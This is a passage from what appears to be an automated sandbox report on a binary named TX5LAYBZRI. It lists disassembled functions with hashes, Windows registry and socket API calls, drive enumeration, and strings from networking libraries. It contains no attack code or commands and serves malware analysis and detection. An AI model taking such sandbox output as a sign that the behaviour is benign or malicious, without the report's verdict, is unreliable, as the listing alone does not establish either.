                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                            • API String ID: 3358416759-2430778319
                                            • Opcode ID: faf3cbaca6ffc11a18684f452495beb9aef2635699257256807c73f660967de5
                                            • Instruction ID: 13a95713c13f0ca9ac63a6c8d022544cd29aa5652b283c808cde6665ae7fd312
                                            • Opcode Fuzzy Hash: faf3cbaca6ffc11a18684f452495beb9aef2635699257256807c73f660967de5
                                            • Instruction Fuzzy Hash: 9AC18F796043059FD718DF24C880A6A7BE1FF88345F54886CF8599B3A1EB30ED89CB85
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adc2c7230fb314a1a39881901b39c961177f0542dbd6aff5b77d0a936b2b1c34
                                            • Instruction ID: e266d7b8e0bd381d8fdb1ae1add77a8da83d911ae5f06de26f7e4b059cc02b36
                                            • Opcode Fuzzy Hash: adc2c7230fb314a1a39881901b39c961177f0542dbd6aff5b77d0a936b2b1c34
                                            • Instruction Fuzzy Hash: 4291123068D3498BD7358A288CC07BBB2D9EFC6324F258BACE899431D4EF759C41D681
                                            APIs
                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00C4712E,?,?,?,00001001,00000000), ref: 00C5A90C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: recvfrom
                                            • String ID:
                                            • API String ID: 846543921-0
                                            • Opcode ID: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                            • Instruction ID: 3999048c8298f7cc4c5a9e2bff3e5131e15d3c968de829c33cda294078692535
                                            • Opcode Fuzzy Hash: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                            • Instruction Fuzzy Hash: 3DF06D79108318AFD2209E02DC44D6BBBEDFFC9754F05466DFD58232118271AE14CAB6
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00C4AA19
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00C4AA4C
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00C4AA97
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00C4AAE9
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00C4AB30
                                            • RegCloseKey.KERNELBASE(?), ref: 00C4AB6A
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00C4AB82
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00C4AC46
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00C4AD0A
                                            • RegEnumKeyExA.KERNELBASE ref: 00C4AD8D
                                            • RegCloseKey.KERNELBASE(?), ref: 00C4ADD9
                                            • RegEnumKeyExA.KERNELBASE ref: 00C4AE08
                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00C4AE2A
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00C4AE54
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00C4AF63
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00C4AFB2
                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00C4B072
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: QueryValue$Open$CloseEnum
                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                            • API String ID: 4217438148-1047472027
                                            • Opcode ID: e87db45f3dea2a367ab849423bf9c3954a482ae41c498343e74ac02b1a1272ce
                                            • Instruction ID: 629e5b4e914a8c9b4ae7e1a5cc8ac5d93530261c82c553ed3b4dfe9978007dee
                                            • Opcode Fuzzy Hash: e87db45f3dea2a367ab849423bf9c3954a482ae41c498343e74ac02b1a1272ce
                                            • Instruction Fuzzy Hash: 3772AEB1648301AFE720DB24DC81BABBBE8BF95740F144828F995D7291E771E944CB63
                                            APIs
                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00BCA832
                                            Strings
                                            • Bind to local port %d failed, trying next, xrefs: 00BCAFE5
                                            • Local port: %hu, xrefs: 00BCAF28
                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00BCA796
                                            • bind failed with errno %d: %s, xrefs: 00BCB080
                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00BCA6CE
                                            • cf-socket.c, xrefs: 00BCA5CD, 00BCA735
                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00BCAE1F
                                            • Trying [%s]:%d..., xrefs: 00BCA689
                                            • Local Interface %s is ip %s using address family %i, xrefs: 00BCAE60
                                            • @, xrefs: 00BCAC42
                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00BCAD0A
                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00BCADAC
                                            • Trying %s:%d..., xrefs: 00BCA7C2, 00BCA7DE
                                            • Could not set TCP_NODELAY: %s, xrefs: 00BCA871
                                            • @, xrefs: 00BCA8F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: setsockopt
                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                            • API String ID: 3981526788-2373386790
                                            • Opcode ID: 12751fa4aa42689726b0b8a64488da8234dbfe49304a68a9ec4efafafe852f3c
                                            • Instruction ID: 10de92ba9ed379acd5f579be5bd3372561e8f6890ffa499444a1d2646f7e1870
                                            • Opcode Fuzzy Hash: 12751fa4aa42689726b0b8a64488da8234dbfe49304a68a9ec4efafafe852f3c
                                            • Instruction Fuzzy Hash: 7662F471508345ABE7219F24C846FABB7E4FF81318F0449ADF98897292E771E845CB93

                                            Control-flow Graph

                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00C59946
                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00C59974
                                            • RegCloseKey.KERNELBASE(?), ref: 00C5998B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                            • API String ID: 3677997916-4129964100
                                            • Opcode ID: c3b123de569c753ad7ce460f3828c871fb465676b19d7fa3ea5e32d4a2c0bdd8
                                            • Instruction ID: 5a435e64803ff2d78e0d3b1e70a55b87aa44d3a671b95cb8d5d98e740971aa58
                                            • Opcode Fuzzy Hash: c3b123de569c753ad7ce460f3828c871fb465676b19d7fa3ea5e32d4a2c0bdd8
                                            • Instruction Fuzzy Hash: 5832F5B9904201ABEB10AB21EC42A5B76E4FF54319F084874FD0997263F731EE58E797

                                            Control-flow Graph

                                            APIs
                                            • connect.WS2_32(?,?,00000001), ref: 00BC8C30
                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00BC8CF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: Sleepconnect
                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                            • API String ID: 238548546-879669977
                                            • Opcode ID: 2284bba0f726183991c868fd349ca0768cf4b117213dd6cc333f4358f91184b3
                                            • Instruction ID: 7efe1fca8f9bc79d7f193f6c331bcaaca2d9138ee4f3d3048312bc256cfeb217
                                            • Opcode Fuzzy Hash: 2284bba0f726183991c868fd349ca0768cf4b117213dd6cc333f4358f91184b3
                                            • Instruction Fuzzy Hash: 02B1AD70604306AFDB10CF24C985FA6BBE0EF45314F1889ADE85A5B2D2DB71EC44C761

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseEnumOpen
                                            • String ID: d
                                            • API String ID: 1332880857-2564639436
                                            • Opcode ID: 9c34d9f920ea90696e5f61485dc50aebb68e0b21df2abbd6728a9492b7b528ea
                                            • Instruction ID: f431d27b2617b15d5fbe5da50b95b8cadbd7db97ccfe9669eac7b204f8bec128
                                            • Opcode Fuzzy Hash: 9c34d9f920ea90696e5f61485dc50aebb68e0b21df2abbd6728a9492b7b528ea
                                            • Instruction Fuzzy Hash: 757197B49053199FDB54DF69D58479EBBF0FF84308F1088ADE898A7310D7749A888F92

                                            Control-flow Graph

                                            APIs
                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00BC935C
                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00BC9389
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: Ioctlsetsockopt
                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                            • API String ID: 1903391676-2691795271
                                            • Opcode ID: 0c51c8efa6f496a91c296d2e9e9c1e29ec3c4575c6529b0f6e18a88335c64d6a
                                            • Instruction ID: de29441c6bfd03f53a3ccf1656d232ae2071a58db488bcce53cfe4f08a52c4d0
                                            • Opcode Fuzzy Hash: 0c51c8efa6f496a91c296d2e9e9c1e29ec3c4575c6529b0f6e18a88335c64d6a
                                            • Instruction Fuzzy Hash: 2551DC70600305ABEB25DF24C885FAAB7E5FF84314F1485ADFD588B292E730E991CB91

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block b976a0, calls send and the internal routines b972a0, b9cb20 and f18c50.
                                            APIs
                                            • send.WS2_32(multi.c,?,?,?,00B93D4E,00000000,?,?,00BA07BF), ref: 00B976EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                            • API String ID: 2809346765-3388739168
                                            • Opcode ID: d38fb0c4c3d2a47cfd8f57671333eecf90c4520d2209f57f66db048376e9c5b0
                                            • Instruction ID: ded6722c8174c9617c39c917d13573deb716aa46bb3fc79bd6af512dfb573a92
                                            • Opcode Fuzzy Hash: d38fb0c4c3d2a47cfd8f57671333eecf90c4520d2209f57f66db048376e9c5b0
                                            • Instruction Fuzzy Hash: 03113DB1A69304BBD9209715EC8AE373BDDDBC3B68F450558B81813301EA659C01C7B1

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block b97770, calls recv and the internal routines b972a0, b9cb20 and f18c50.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: recv
                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                            • API String ID: 1507349165-640788491
                                            • Opcode ID: a886d96987304b5ca254c8c08883433efcbfa752540051ad7004c0093751f168
                                            • Instruction ID: a067dfbce8c380ac6d6de27a3b857bca35dee2c79d315824b0fa686701aeb7cb
                                            • Opcode Fuzzy Hash: a886d96987304b5ca254c8c08883433efcbfa752540051ad7004c0093751f168
                                            • Instruction Fuzzy Hash: 521150B4A69304BBE5209721EC8EE277BDDDBC7B58F45056CB80853341DA619C01C6F2

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block b975e0, calls socket and the internal routines b972a0, b9cb20 and f18c50.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                            • API String ID: 98920635-842387772
                                            • Opcode ID: 7b1d999b671596b2b81476d00673cfba342f4ec5a61bafb32ce45cc879051986
                                            • Instruction ID: 0f3047af0618cdecce29c559853e41b43322bc9f9c2c3beb1d8a9e5645145056
                                            • Opcode Fuzzy Hash: 7b1d999b671596b2b81476d00673cfba342f4ec5a61bafb32ce45cc879051986
                                            • Instruction Fuzzy Hash: 81118872A6521267EA215B7AFC0AF8B3BD9DFC3724F450568F81492382D7118892C7E1

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block c5aa30, calls socket, ioctlsocket, setsockopt and connect, plus the internal routines c4e730, c4ea60, c4ebf0, c5af70, c4e760, c4e7c0 and c4e180.
                                            APIs
                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00C5AB9B
                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00C5ABE3
                                            • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 00C5AD20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: ioctlsocketsetsockoptsocket
                                            • String ID:
                                            • API String ID: 2067140946-0
                                            • Opcode ID: 8f9312ba64eb9fac8abdb52735938b31dad9ef52728542c8c0e9cf1e79239a9a
                                            • Instruction ID: 29ae66f9a426a2c4eb1b747b490d7fc82444827156f0de7973ca6e2074e04d98
                                            • Opcode Fuzzy Hash: 8f9312ba64eb9fac8abdb52735938b31dad9ef52728542c8c0e9cf1e79239a9a
                                            • Instruction Fuzzy Hash: D5E1D2746003029BEB20CF16C885B6B77A5FF85311F144B2CFDA88B291E775D998CB96

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block 794014a, calls GetLogicalDrives and the internal routines 79402b7 and 794042a.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: b5a5358d86e243863bd3245a2a9f2f85e9a27de378b8b4f2f1c818d7117f6c15
                                            • Instruction ID: 41203dd843b86779682f4fb55fa6482a18dfddb806dd9bf6dc670fc25095763b
                                            • Opcode Fuzzy Hash: b5a5358d86e243863bd3245a2a9f2f85e9a27de378b8b4f2f1c818d7117f6c15
                                            • Instruction Fuzzy Hash: 2D71B2FB26C121BD7142C48A2B54DFB6B6DE4C7738B308CABFA07D6542E2D84E495171

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block 79400e1, calls GetLogicalDrives and the internal routines 79402b7 and 794042a.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: 3866f239ab682270ece0913b2a0eec4b3a0a03373ed0cedab54efc93d9b24085
                                            • Instruction ID: d5b3682e76d681302973b8d221319ab8bbde726a9ce497e13565d41597967774
                                            • Opcode Fuzzy Hash: 3866f239ab682270ece0913b2a0eec4b3a0a03373ed0cedab54efc93d9b24085
                                            • Instruction Fuzzy Hash: 6971B1FB26C121BD7142C08A2B54DFB6B6DE4C7778B308CABFA07D6502E2D84E496171

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block 79400d7, calls GetLogicalDrives and the internal routines 79402b7 and 794042a.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 1dab1f5618d197d26c94bb2f8a52cbf8ef3c6cd753afd68970f94ee59bc24801
                                            • Instruction ID: 2481f262e62aa4084ae8083fc6e29d8f002b19535463446f9b1c09a600d17e48
                                            • Opcode Fuzzy Hash: 1dab1f5618d197d26c94bb2f8a52cbf8ef3c6cd753afd68970f94ee59bc24801
                                            • Instruction Fuzzy Hash: ED7181FB26C121BD7142C08A2B54DFB6B6DE4C7778B308CBBFA07D6542E2D84A496171

                                             Control-flow Graph
                                             • Graph image not captured; recoverable data: entry block 7940100, calls GetLogicalDrives and the internal routines 79402b7 and 794042a.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: de6e1fba4280ad21ef8d6a3333e287db17e955a0891b1bc422df0627b1e946c8
                                            • Instruction ID: 9ab444a411ab4b7980afa690f619e8e94f9da78e7e9bdca3ab19d61ec3265902
                                            • Opcode Fuzzy Hash: de6e1fba4280ad21ef8d6a3333e287db17e955a0891b1bc422df0627b1e946c8
                                            • Instruction Fuzzy Hash: A46192FB26C121BD7142C08A2B14DFB6B6DE4C7738B308CB7FA07D6542E2D84A496171
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 0fbc9e83fe3a6b3f47e509631b32c8764c15726efee47b2ca33038fea4b9f902
                                            • Instruction ID: 2f197a7d7905100b2cf6647202b1c58ab0a957060bdf8b985335524bb8a2beea
                                            • Opcode Fuzzy Hash: 0fbc9e83fe3a6b3f47e509631b32c8764c15726efee47b2ca33038fea4b9f902
                                            • Instruction Fuzzy Hash: A76192FB26C121BE7142C18A2B54DFB6B6DE4C7738B30CCA7FA07D6542E2D84A496171
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: 57661f34ebcb76f8d0fb72d1400382dae8b58165d79560b9f618669bde19ae7d
                                            • Instruction ID: 15a7df6beff73f93052c415d04acb0dd3bcce27b1da671135716b8d2eca4da99
                                            • Opcode Fuzzy Hash: 57661f34ebcb76f8d0fb72d1400382dae8b58165d79560b9f618669bde19ae7d
                                            • Instruction Fuzzy Hash: B96191FB26C121BD7152808A2B14EFB6B6DE4C7778B30CCA7FA07D6542E2D84A496171
                                            Strings
                                            Memory Dump Source
